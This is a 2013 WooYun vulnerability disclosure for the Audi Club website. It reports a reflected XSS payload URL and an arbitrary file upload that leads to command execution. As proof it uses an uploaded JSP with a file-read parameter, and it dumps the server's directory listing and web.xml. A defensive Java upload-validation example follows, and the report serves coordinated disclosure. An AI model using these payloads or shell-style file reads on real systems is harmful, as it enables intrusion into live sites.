
Vulnerability summary

Defect ID: wooyun-2013-025533

Title: Audi Club code execution

Vendor: FAW-Volkswagen Automotive Co., Ltd.

Author: zhk

Submitted: 2013-06-09 12:48

Fix date: 2013-07-24 12:48

Public disclosure: 2013-07-24 12:48

Vulnerability type: command execution

Severity: high

Self-assessed Rank: 15

Status: handed over to a third-party partner organisation (CNCERT, the National Internet Emergency Center) for handling

Source: http://www.wooyun.org; for questions or help please contact [email protected]



Vulnerability details

Disclosure status:

2013-06-09: Details sent to the vendor, awaiting vendor handling
2013-06-14: Vendor has confirmed; details disclosed to the vendor only
2013-06-24: Details disclosed to core white hats and experts in the relevant field
2013-07-04: Details disclosed to regular white hats
2013-07-14: Details disclosed to intern white hats
2013-07-24: Details disclosed to the public

Brief description:

Code execution on Audi Club, with an XSS thrown in as well

Detailed description:

Reflected XSS: http://www.audiclub.cn/uploadHeadImg/uploadimage.jsp?Picurl=pic2000844.jpg%22%3EXSS%20here&step=2
Code execution: http://www.audiclub.cn/circle!create.action allows arbitrary file upload, which leads to command execution

Current directory: /www/newaudi_cms/audiclub/
Subdirectories:
/www/newaudi_cms/audiclub/weibo
/www/newaudi_cms/audiclub/circle
/www/newaudi_cms/audiclub/upload
/www/newaudi_cms/audiclub/admin
/www/newaudi_cms/audiclub/album
/www/newaudi_cms/audiclub/activity
/www/newaudi_cms/audiclub/integral
/www/newaudi_cms/audiclub/landofquattro
/www/newaudi_cms/audiclub/q3
/www/newaudi_cms/audiclub/vedio
/www/newaudi_cms/audiclub/My97DatePicker
/www/newaudi_cms/audiclub/image
/www/newaudi_cms/audiclub/js
/www/newaudi_cms/audiclub/common
/www/newaudi_cms/audiclub/2013shms
/www/newaudi_cms/audiclub/user
/www/newaudi_cms/audiclub/uploadfiles
/www/newaudi_cms/audiclub/xheditor-1.1.14
/www/newaudi_cms/audiclub/m
/www/newaudi_cms/audiclub/WEB-INF
/www/newaudi_cms/audiclub/uploadHeadImg
/www/newaudi_cms/audiclub/excellence
Files:
/www/newaudi_cms/audiclub/index.jsp
/www/newaudi_cms/audiclub/wb_e4b0b2761bda439d.txt
/www/newaudi_cms/audiclub/__utm.gif
/www/newaudi_cms/audiclub/index.html
/www/newaudi_cms/audiclub/500.html
/www/newaudi_cms/audiclub/404.html
/www/newaudi_cms/audiclub/crossdomain.xml
/www/newaudi_cms/audiclub/login.jsp
/www/newaudi_cms/audiclub/urchin.js

Proof of vulnerability:

view-source:http://www.audiclub.cn/image/1370751804647.jsp?p=/WEB-INF/web.xml

FILE:/WEB-INF/web.xml

<?xml version="1.0" encoding="UTF-8"?>
<web-app xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
    xmlns="http://java.sun.com/xml/ns/javaee"
    xmlns:web="http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd"
    xsi:schemaLocation="http://java.sun.com/xml/ns/javaee http://java.sun.com/xml/ns/javaee/web-app_2_5.xsd"
    id="WebApp_ID" version="2.5">
  <display-name>OEMP CMS</display-name>
  <context-param>
    <param-name>contextConfigLocation</param-name>
    <param-value>/WEB-INF/classes/applicationContext.xml</param-value>
  </context-param>
  <filter>
    <filter-name>struts-cleanup</filter-name>
    <filter-class>org.apache.struts2.dispatcher.ActionContextCleanUp</filter-class>
  </filter>

  <filter>
    <filter-name>osivFilter</filter-name>
    <filter-class>org.springframework.orm.hibernate3.support.OpenSessionInViewFilter</filter-class>
  </filter>
  <filter>
    <filter-name>struts2</filter-name>
    <filter-class>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilter</filter-class>
  </filter>

  <filter-mapping>
    <filter-name>struts-cleanup</filter-name>
    <url-pattern>/*</url-pattern>
  </filter-mapping>

  <filter-mapping>
    <filter-name>osivFilter</filter-name>
    <url-pattern>*.action</url-pattern>
  </filter-mapping>

  <filter-mapping>
    <filter-name>struts2</filter-name>
    <url-pattern>*.jsp</url-pattern>
  </filter-mapping>

  <filter-mapping>
    <filter-name>osivFilter</filter-name>
    <url-pattern>*.htm</url-pattern>
  </filter-mapping>

  <filter-mapping>
    <filter-name>struts2</filter-name>
    <url-pattern>*.action</url-pattern>
  </filter-mapping>
  <filter-mapping>
    <filter-name>struts2</filter-name>
    <url-pattern>*.jsp</url-pattern>
  </filter-mapping>
  <filter-mapping>
    <filter-name>struts2</filter-name>
    <url-pattern>*.htm</url-pattern>
  </filter-mapping>

  <listener>
    <listener-class>org.springframework.web.context.ContextLoaderListener</listener-class>
  </listener>
  <!-- Spring: flush the Introspector to prevent memory leaks -->
  <listener>
    <listener-class>org.springframework.web.util.IntrospectorCleanupListener</listener-class>
  </listener>
  <!-- this listener needs to be commented out -->

  <!-- session timeout, in minutes -->
  <session-config>
    <session-timeout>120</session-timeout>
  </session-config>

  <error-page>
    <error-code>500</error-code>
    <location>/500.html</location>
  </error-page>
  <error-page>
    <error-code>404</error-code>
    <location>/404.html</location>
  </error-page>
  <welcome-file-list>
    <welcome-file>index.htm</welcome-file>
    <welcome-file>index.html</welcome-file>
    <welcome-file>index.jsp</welcome-file>
  </welcome-file-list>

  <mime-mapping>
    <extension>rar</extension>
    <mime-type>application/zip</mime-type>
  </mime-mapping>
  <mime-mapping>
    <extension>doc</extension>
    <mime-type>application/zip</mime-type>
  </mime-mapping>

  <!-- avatar upload servlet: start -->
  <servlet>
    <servlet-name>UpLoadUserHeadImage</servlet-name>
    <servlet-class>com.oemp.audi.uploadHeadImg.servlet.UpLoadUserHeadImage</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>UpLoadUserHeadImage</servlet-name>
    <url-pattern>/servlet/UpLoadUserHeadImage</url-pattern>
  </servlet-mapping>

  <servlet>
    <servlet-name>ZoomImage</servlet-name>
    <servlet-class>com.oemp.audi.uploadHeadImg.servlet.ZoomImage</servlet-class>
  </servlet>
  <servlet-mapping>
    <servlet-name>ZoomImage</servlet-name>
    <url-pattern>/servlet/ZoomImage</url-pattern>
  </servlet-mapping>
  <!-- avatar upload servlet: end -->
</web-app>


[Screenshot: 2013-06-09 12:04:25 screenshot.png]


Fix recommendation:

Filter the uploaded files.

Copyright notice: when reposting, please credit the source zhk@WooYun
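As an added illustration of the server-side filtering this fix calls for (example code, not the reporter's and not the site's own), written in Java because the application is a Struts2/JSP web app; the class name, the image allow-list and the storage directory are assumptions, and Map.of needs Java 9 or later:

```java
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Path;
import java.util.Arrays;
import java.util.Locale;
import java.util.Map;
import java.util.UUID;

public final class SafeUpload {
    // Allow-listed extensions and the magic bytes each file type must start with (assumed list).
    private static final Map<String, byte[]> ALLOWED = Map.of(
        "jpg",  new byte[]{(byte) 0xFF, (byte) 0xD8, (byte) 0xFF},
        "jpeg", new byte[]{(byte) 0xFF, (byte) 0xD8, (byte) 0xFF},
        "png",  new byte[]{(byte) 0x89, 'P', 'N', 'G'},
        "gif",  new byte[]{'G', 'I', 'F', '8'});

    /** Returns the allow-listed extension of a client-supplied name, or null to reject it. */
    static String checkName(String clientName) {
        if (clientName == null || clientName.indexOf('\0') >= 0) return null;
        int dot = clientName.lastIndexOf('.');
        if (dot < 0 || dot == clientName.length() - 1) return null;
        // Only the final extension counts, so "x.jpg.jsp" is rejected here, while
        // "x.jsp.jpg" passes by name and must still pass the content check below.
        String ext = clientName.substring(dot + 1).toLowerCase(Locale.ROOT);
        return ALLOWED.containsKey(ext) ? ext : null;
    }

    /** True if the first bytes of the content match the signature for ext. */
    static boolean checkMagic(byte[] content, String ext) {
        byte[] sig = ALLOWED.get(ext);
        return sig != null && content.length >= sig.length
            && Arrays.equals(Arrays.copyOf(content, sig.length), sig);
    }

    /** Writes the upload under a random server-chosen name into storeDir, which must lie
     *  outside the web root so the container never hands the file to the JSP engine. */
    static Path store(Path storeDir, String clientName, byte[] content) throws IOException {
        String ext = checkName(clientName);
        if (ext == null || !checkMagic(content, ext)) {
            throw new IOException("upload rejected: " + clientName);
        }
        // The client's file name is never used on disk; only the vetted extension survives.
        Path target = storeDir.resolve(UUID.randomUUID() + "." + ext).normalize();
        if (!target.startsWith(storeDir.normalize())) throw new IOException("path escape");
        Files.write(target, content);
        return target;
    }
}
```

Serving the stored images back through a servlet such as the ZoomImage one mapped in web.xml, rather than by direct path, means that even a file that slips past the checks is never executed.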


Vulnerability response

Vendor response:

Severity: low

Vulnerability Rank: 5

Confirmed: 2013-06-14 01:25

Vendor reply:

Latest status:

None yet